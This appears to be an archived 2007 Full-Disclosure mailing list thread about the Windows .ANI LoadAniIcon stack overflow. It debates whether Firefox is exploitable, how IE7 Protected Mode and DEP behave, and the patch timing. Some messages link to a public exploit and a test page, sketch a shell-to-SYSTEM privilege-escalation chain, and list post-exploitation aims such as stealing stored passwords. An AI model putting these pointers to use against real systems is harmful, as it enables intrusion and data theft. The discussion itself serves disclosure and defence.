Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Knud Erik Højgaard]

On 4/10/07, Brooks, Shane <[EMAIL PROTECTED]> wrote:
> Do you have a working exploit for this vuln?  The SecFocus page says none is 
> publicly available.

To contribute to this, the longest and most boring thread ever, look
at www.milw0rm.com (hi str0ke), specifically
http://www.milw0rm.com/exploits/3688 - 'The SecFocus page' hardly ever
update that stuff (corporate whores) because they earn money by
"protecting" people.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Brooks, Shane]

Do you have a working exploit for this vuln?  The SecFocus page says none is 
publicly available.

S

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michal 
Majchrowicz
Sent: Tuesday, April 10, 2007 5:02 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Hi.
One thing to add about IE protected mode and all that stuff:
We get shell (in ie protected mode) using ani vulnerability.
Go to the IE temporary directory. It must have write access there :)
Then we use this: http://www.securityfocus.com/bid/23278
And we have SYSTEM access :)
Regards.


On 4/8/07, wac <[EMAIL PROTECTED]> wrote:
> Hello:
>
> Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
> remember exactly what it did but it behaved in a strange way I believe some
> file handle was left open and had to kill it the hard way. I don't know what
> they say in the docs but if it ends up calling the user32 function and
> that's all it takes to trigger the bug. I was taking a peek at it's import
> tables and It imports from User32 the function LoadCursorA maybe that could
> be the guilty one.
>
> anyway test here and see what happens (that link is from dev code)
>
> http://sicotik.com/ink/test.html
>
> I'm not vulnerable anymore since quite some time ;) and I don't have much
> time to test right now
>
> Regards
> Waldo
>
>
> On 4/8/07, Michal Majchrowicz <[EMAIL PROTECTED]> wrote:
> > Hi.
> > There are more and more reports about FF and ani vulnerability.
> > There was already a presentation of working exploit.
> > The thing starts to annoy me and since I am far away from any windows
> > I wanted to share some of my speculations.
> > According to docs two things are obvious:
> > 1) Firefox doesn't support ANI cursors
> > 2) ANI is just few cur cursors packed together and presented as an
> animation.
> > So i have three possible ways of exploiting it:
> > 1) Since ANI files are vulnerable then maybe cur files are also
> > vulnerable. Firefox does support CUR files.
> > 2) If firefox doesn't support ANI files it only means it doesn't
> > render them. It doesn't mean it will not acept them in any way:)
> > 3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
> > Then FF will call win api with this cursor. Windows API will recognize
> > this as ANI file and call vulnerable function .
> > As I said before these are just speculation. I hope someone will be
> > able to confirm or prove that some of them (or all) have no sense.
> > Happy Easter to everyone.
> > Regards Michal.
> >
> > On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> > > >That's correct, Firefox doesn't support ANI files for cursors.
> > >
> > > Right, and it doesn't need to, because cursors are not the only way to
> reach the vulnerable code.
> > > Icons can do it, too.
> > >
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-- 
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.5.446 / Virus Database: 269.0.0/754 - Release Date: 4/9/2007 10:59 PM
 

-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.446 / Virus Database: 269.0.0/754 - Release Date: 4/9/2007 10:59 PM
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Michal Majchrowicz]

Hi.
One thing to add about IE protected mode and all that stuff:
We get shell (in ie protected mode) using ani vulnerability.
Go to the IE temporary directory. It must have write access there :)
Then we use this: http://www.securityfocus.com/bid/23278
And we have SYSTEM access :)
Regards.


On 4/8/07, wac <[EMAIL PROTECTED]> wrote:
> Hello:
>
> Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
> remember exactly what it did but it behaved in a strange way I believe some
> file handle was left open and had to kill it the hard way. I don't know what
> they say in the docs but if it ends up calling the user32 function and
> that's all it takes to trigger the bug. I was taking a peek at it's import
> tables and It imports from User32 the function LoadCursorA maybe that could
> be the guilty one.
>
> anyway test here and see what happens (that link is from dev code)
>
> http://sicotik.com/ink/test.html
>
> I'm not vulnerable anymore since quite some time ;) and I don't have much
> time to test right now
>
> Regards
> Waldo
>
>
> On 4/8/07, Michal Majchrowicz <[EMAIL PROTECTED]> wrote:
> > Hi.
> > There are more and more reports about FF and ani vulnerability.
> > There was already a presentation of working exploit.
> > The thing starts to annoy me and since I am far away from any windows
> > I wanted to share some of my speculations.
> > According to docs two things are obvious:
> > 1) Firefox doesn't support ANI cursors
> > 2) ANI is just few cur cursors packed together and presented as an
> animation.
> > So i have three possible ways of exploiting it:
> > 1) Since ANI files are vulnerable then maybe cur files are also
> > vulnerable. Firefox does support CUR files.
> > 2) If firefox doesn't support ANI files it only means it doesn't
> > render them. It doesn't mean it will not acept them in any way:)
> > 3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
> > Then FF will call win api with this cursor. Windows API will recognize
> > this as ANI file and call vulnerable function .
> > As I said before these are just speculation. I hope someone will be
> > able to confirm or prove that some of them (or all) have no sense.
> > Happy Easter to everyone.
> > Regards Michal.
> >
> > On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> > > >That's correct, Firefox doesn't support ANI files for cursors.
> > >
> > > Right, and it doesn't need to, because cursors are not the only way to
> reach the vulnerable code.
> > > Icons can do it, too.
> > >
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[wac]

Hello:

Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't
remember exactly what it did but it behaved in a strange way I believe some
file handle was left open and had to kill it the hard way. I don't know what
they say in the docs but if it ends up calling the user32 function and
that's all it takes to trigger the bug. I was taking a peek at it's import
tables and It imports from User32 the function LoadCursorA maybe that could
be the guilty one.

anyway test here and see what happens (that link is from dev code)

http://sicotik.com/ink/test.html

I'm not vulnerable anymore since quite some time ;) and I don't have much
time to test right now

Regards
Waldo

On 4/8/07, Michal Majchrowicz <[EMAIL PROTECTED]> wrote:


Hi.
There are more and more reports about FF and ani vulnerability.
There was already a presentation of working exploit.
The thing starts to annoy me and since I am far away from any windows
I wanted to share some of my speculations.
According to docs two things are obvious:
1) Firefox doesn't support ANI cursors
2) ANI is just few cur cursors packed together and presented as an
animation.
So i have three possible ways of exploiting it:
1) Since ANI files are vulnerable then maybe cur files are also
vulnerable. Firefox does support CUR files.
2) If firefox doesn't support ANI files it only means it doesn't
render them. It doesn't mean it will not acept them in any way:)
3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
Then FF will call win api with this cursor. Windows API will recognize
this as ANI file and call vulnerable function .
As I said before these are just speculation. I hope someone will be
able to confirm or prove that some of them (or all) have no sense.
Happy Easter to everyone.
Regards Michal.

On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> >That's correct, Firefox doesn't support ANI files for cursors.
>
> Right, and it doesn't need to, because cursors are not the only way to
reach the vulnerable code.
> Icons can do it, too.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Michal Majchrowicz]

Hi.
There are more and more reports about FF and ani vulnerability.
There was already a presentation of working exploit.
The thing starts to annoy me and since I am far away from any windows
I wanted to share some of my speculations.
According to docs two things are obvious:
1) Firefox doesn't support ANI cursors
2) ANI is just few cur cursors packed together and presented as an animation.
So i have three possible ways of exploiting it:
1) Since ANI files are vulnerable then maybe cur files are also
vulnerable. Firefox does support CUR files.
2) If firefox doesn't support ANI files it only means it doesn't
render them. It doesn't mean it will not acept them in any way:)
3) Maybe it is possible to rename foo.ani and rename it to foo.cur.
Then FF will call win api with this cursor. Windows API will recognize
this as ANI file and call vulnerable function .
As I said before these are just speculation. I hope someone will be
able to confirm or prove that some of them (or all) have no sense.
Happy Easter to everyone.
Regards Michal.

On 4/4/07, Peter Ferrie <[EMAIL PROTECTED]> wrote:
> >That's correct, Firefox doesn't support ANI files for cursors.
>
> Right, and it doesn't need to, because cursors are not the only way to reach 
> the vulnerable code.
> Icons can do it, too.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Peter Ferrie]

>That's correct, Firefox doesn't support ANI files for cursors.
 
Right, and it doesn't need to, because cursors are not the only way to reach 
the vulnerable code.
Icons can do it, too.
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Daniel Veditz]

George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is if we
> will see this technique for Firefox exploitation posted now?

Why? That would needlessly put Firefox users at risk -- not everyone will
be able to apply the Windows patch immediately. Microsoft may have had
since December to craft a patch, but the Firefox team hasn't.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

Larry Seltzer wrote:
>>> Larry, why are you so curious about how this exploit works? 
> 
> Because the Firefox docs say they don't support ANI files for cursors
> and I can't get any non-malicious ones to work in it. I have to admit
> I'm having trouble getting them to work in IE now too.

That's correct, Firefox doesn't support ANI files for cursors. If the
exploitation method was so obvious, we would already have Firefox exploits in
the wild, wouldn't we?

> What's wrong with this code?
> 
> 
> 
> 
> BODY{cursor: url(http://www.larryseltzer.com/DRUM.ANI);}
> 

Maybe the url should be in quites? This works for me:


Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>Firefox doesn't support ANI files for cursors. If the exploitation
method was so obvious, we would already have Firefox exploits in the
wild, wouldn't we? 

I don't know. I'll have to think about how else you would get it to use
an ANI. There's no Flash involved, is there?

>>Maybe the url should be in quites? This works for me:
>>

It's actually supposed to work with or without quotes I think and I've
tried a dozen variants and yours here. No luck. The cursors are straight
out of c:\windows\cursors. I'll try it in the morning.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>Larry, why are you so curious about how this exploit works? 

Because the Firefox docs say they don't support ANI files for cursors
and I can't get any non-malicious ones to work in it. I have to admit
I'm having trouble getting them to work in IE now too.

What's wrong with this code?




BODY{cursor: url(http://www.larryseltzer.com/DRUM.ANI);}

This is a harmless animated cursor.
This is a harmless animated cursor.
This is a harmless animated cursor.
This is a harmless animated cursor.


Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

Larry Seltzer wrote:
> Alex had said that he was exploiting this bug on Firefox, even though
> the Firefox docs say it should be impossible. I'm just trying to
> understand how his claims are possible.
> 
> There's no reason to believe the Firefox developers need to do anything.
> IE, for example, is fixed when the ANI code in GDI is fixed. 

To avoid any confusion:

1) There is no vulnerability in the Firefox source code

2) Firefox uses a Windows API function which uses the vulnerable code in
USER32.DLL, so the ANI vulnerability can be exploited through Firefox

3) Installing the MS07-017 patch will protect both IE and Firefox against this
vulnerability

4) There is no vulnerability for the Firefox developers to patch. I recommend
that they limit their use of the Windows API to avoid being affected by the next
Windows vuln, but this is application hardening, not a vulnerability fix.

5) Even thought the patch is already out, I'd like to avoid harming Windows
users who haven't installed it, so that's why I'm not releasing the details
about the Firefox exploit just yet.


Larry, why are you so curious about how this exploit works?


Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

Alex had said that he was exploiting this bug on Firefox, even though
the Firefox docs say it should be impossible. I'm just trying to
understand how his claims are possible.

There's no reason to believe the Firefox developers need to do anything.
IE, for example, is fixed when the ANI code in GDI is fixed. 

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: Daniel Veditz [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, April 03, 2007 9:47 PM
To: George Ou
Cc: Larry Seltzer; 'Alexander Sotirov';
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is

> if we will see this technique for Firefox exploitation posted now?

Why? That would needlessly put Firefox users at risk -- not everyone
will be able to apply the Windows patch immediately. Microsoft may have
had since December to craft a patch, but the Firefox team hasn't.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[[EMAIL PROTECTED]]

Affected Software:

Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition and Microsoft Windows XP 
Professional x64 Edition Service Pack 2
Microsoft Windows Server 2003, Microsoft Windows Server 2003 Service 
Pack 1, and Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 for Itanium-based Systems, Microsoft 
Windows Server 2003 with SP1 for Itanium-based Systems, and Microsoft 
Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition and Microsoft Windows Server 
2003 x64 Edition Service Pack 2
Windows Vista
Windows Vista x64 Edition

all patches are out without xp sp1 and no warning that I'm seriously at 
risk if i'm not urgently upgrading to sp2, no way! I'll keep my cheese =)


George Ou wrote:
> The patch for ANI is out from Microsoft.  I'm assuming the question is if we
> will see this technique for Firefox exploitation posted now?
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Larry
> Seltzer
> Sent: Tuesday, April 03, 2007 2:14 PM
> To: Alexander Sotirov
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>
> LS> The Firefox docs say that it doesn't support .ani files for cursors.
>
> LS> How are you exploiting it?
> AS> I'll wait until the patch is out before I publish the technique. 
> AS> As far as I know there are no public ANI exploits for Firefox yet. 
>
> So now can you say how Firefox is vulnerable?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED] 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> .
>
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

The patch for ANI is out from Microsoft.  I'm assuming the question is if we
will see this technique for Firefox exploitation posted now?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Tuesday, April 03, 2007 2:14 PM
To: Alexander Sotirov
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

LS> The Firefox docs say that it doesn't support .ani files for cursors.

LS> How are you exploiting it?
AS> I'll wait until the patch is out before I publish the technique. 
AS> As far as I know there are no public ANI exploits for Firefox yet. 

So now can you say how Firefox is vulnerable?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

LS> The Firefox docs say that it doesn't support .ani files for cursors.

LS> How are you exploiting it?
AS> I'll wait until the patch is out before I publish the technique. 
AS> As far as I know there are no public ANI exploits for Firefox yet. 

So now can you say how Firefox is vulnerable?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

Larry Seltzer wrote:
>>> I just posted a video of exploiting IE7 and Firefox on Vista.  
> 
> The Firefox docs say that it doesn't support .ani files for cursors. How
> are you exploiting it?

I'll wait until the patch is out before I publish the technique. As far as I
know there are no public ANI exploits for Firefox yet.

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

Specifically
http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_pro
perty in the "Limitations" section

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Tuesday, April 03, 2007 12:54 AM
To: Alexander Sotirov; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>I just posted a video of exploiting IE7 and Firefox on Vista.  

The Firefox docs say that it doesn't support .ani files for cursors. How
are you exploiting it?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>I just posted a video of exploiting IE7 and Firefox on Vista.  

The Firefox docs say that it doesn't support .ani files for cursors. How
are you exploiting it?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

Ok thanks.  I guess we need to add "steal data" to the list of things an
exploited IE7 session in Vista can do.  I never got to test that far because
DEP nuked my browser session.


George

-Original Message-
From: Alexander Sotirov [mailto:[EMAIL PROTECTED] 
Sent: Monday, April 02, 2007 7:14 PM
To: George Ou
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

George Ou wrote:
> The exploited instance of IE7 probably spawns cmd.exe with the same
> privilege levels as IE7 in Protected Mode, which means you don't have
> read/write access to the user or system files.  It's still bad because you
> probably get to harvest all of the saved username/passwords in the browser
> and capture all input/output from that IE session.
> 
> Now in the case of an exploited Firefox 2, you have full read/write
> permissions to all of the user files which means you get to steal all the
> user files and/or encrypt them for ransom.

Protected Mode only blocks write access. IE can write only to a few
locations on
the system, but it still has full read access to all files readable by the
user.

See
http://msdn.microsoft.com/library/en-us/IETechCol/dnwebgen/ProtectedMode.asp
and slides 41-53 in
http://download.microsoft.com/download/0/1/3/01381C25-72DA-4AA9-B792-43E02A2
43C71/SEC403_Riley.ppt

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

George Ou wrote:
> The exploited instance of IE7 probably spawns cmd.exe with the same
> privilege levels as IE7 in Protected Mode, which means you don't have
> read/write access to the user or system files.  It's still bad because you
> probably get to harvest all of the saved username/passwords in the browser
> and capture all input/output from that IE session.
> 
> Now in the case of an exploited Firefox 2, you have full read/write
> permissions to all of the user files which means you get to steal all the
> user files and/or encrypt them for ransom.

Protected Mode only blocks write access. IE can write only to a few locations on
the system, but it still has full read access to all files readable by the user.

See http://msdn.microsoft.com/library/en-us/IETechCol/dnwebgen/ProtectedMode.asp
and slides 41-53 in
http://download.microsoft.com/download/0/1/3/01381C25-72DA-4AA9-B792-43E02A243C71/SEC403_Riley.ppt

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

The exploited instance of IE7 probably spawns cmd.exe with the same
privilege levels as IE7 in Protected Mode, which means you don't have
read/write access to the user or system files.  It's still bad because you
probably get to harvest all of the saved username/passwords in the browser
and capture all input/output from that IE session.

Now in the case of an exploited Firefox 2, you have full read/write
permissions to all of the user files which means you get to steal all the
user files and/or encrypt them for ransom.


George

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Alexander
Sotirov
Sent: Monday, April 02, 2007 6:19 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode?

I just posted a video of exploiting IE7 and Firefox on Vista. Internet
Explorer
was running in protected mode with DEP disabled (this is the default Vista
setup). It's interesting that the protected mode of IE does not stop the
execution of cmd.exe, but it does prevent you from writing to the file
system
once you get the shell.

http://determina.blogspot.com/

Alexander Sotirov
Determina Security Research

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode?

I just posted a video of exploiting IE7 and Firefox on Vista. Internet Explorer
was running in protected mode with DEP disabled (this is the default Vista
setup). It's interesting that the protected mode of IE does not stop the
execution of cmd.exe, but it does prevent you from writing to the file system
once you get the shell.

http://determina.blogspot.com/

Alexander Sotirov
Determina Security Research

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[KJKHyperion]

James Matthews wrote:
> The issue is that this only works with DEP turned off!

HOLY SHIT an insightful comment by James Matthews!!! Haha, almost got me 
there, nice April fools!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Kristian Hermansen]

Dave Aitel <[EMAIL PROTECTED]> wrote:
> ASRL has limited entropy and the attacker can continue to try exploits
> an infinite number of times (as Solar Eclipse points out). This means
> you can write a reliable Vista exploit, theoretically. I'll probably
> finish one up on Monday.

On 32-bit, yes, but 64-bit ASLR entropy means it is not very likely to
hit your offset :-)  Has anyone even attempted a 64-bit XP/Vista ANI
exploit?
-- 
Kristian Hermansen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

" You reference the correct page but then completely miss the point, please
read the page entirely. Your pasted information related to software DEP not
Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given."

Thierry,

That wiki quote is very vague.  I'm telling you for a fact that DEP is
mostly turned off in Windows XP and Vista by default.  It's only turned on
for a few "essential windows programs and services" and that excludes things
like Internet Explorer which is unfortunate since hardware-enforced DEP has
blocked nearly all of the generic zero-day exploits in Internet Explorer.
This is why I have always recommended that people fully enable DEP
protection and use hardware that supports NX/XD.



George


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Thierry
Zoller
Sent: Monday, April 02, 2007 8:07 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

Dear Larry,

You are a stubborn guy are you? _Again_, I am not talking Software DEP
but Hardware-enforced DEP. Read: 2 different things.

This is my last email within this regard, I see no point in trying to
give you further information that might help you estimate risk, as you
seem resistant to help or pointers beyond your comprehension or
current believe.

You reference the correct page but then completely miss the point,
please read the page entirely. Your pasted information related to
software DEP not Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given.

"Software DEP" is unrelated to the NX bit, and is what Microsoft calls
their enforcement of Safe Structured Exception Handling. Software
DEP/SafeSEH
simply checks when an exception is thrown to make sure that the exception is
registered in a function table for the application, and requires the program
to be built with it. This is likely a countermeasure to handle an exploit
possible because of the way DEP handles NX faults; while most other
technologies simply terminate the program unquestioningly, DEP raises
an exception. It is not possible for a program to truly recover from
an attack because program flow is destroyed in an unrecoverable manner.


On the very same MS you reference page :

Hardware-enforced DEP
Hardware-enforced DEP marks all memory locations in a process as
non-executable unless the location explicitly contains executable code.
A class of attacks exists that tries to insert and run code from
non-executable memory locations. DEP helps prevent these attacks by
intercepting them and raising an exception.

Hardware-enforced DEP relies on processor hardware to mark memory with an
attribute that indicates that code should not be executed
from that memory. DEP functions on a per-virtual memory page basis, and DEP
typically changes a bit in the page table entry (PTE)
to mark the memory page.

Processor architecture determines how DEP is implemented in hardware and how
DEP marks the virtual memory page. However,
processors that support hardware-enforced DEP can raise an exception when
code is executed from a page that is marked with
the appropriate attribute set.

Advanced Micro Devices (AMD) and Intel have defined and shipped
Windows-compatible architectures that are compatible with DEP.

Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the
following:
•   The no-execute page-protection (NX) processor feature as defined by
AMD.
•   The Execute Disable Bit (XD) feature as defined byIntel.


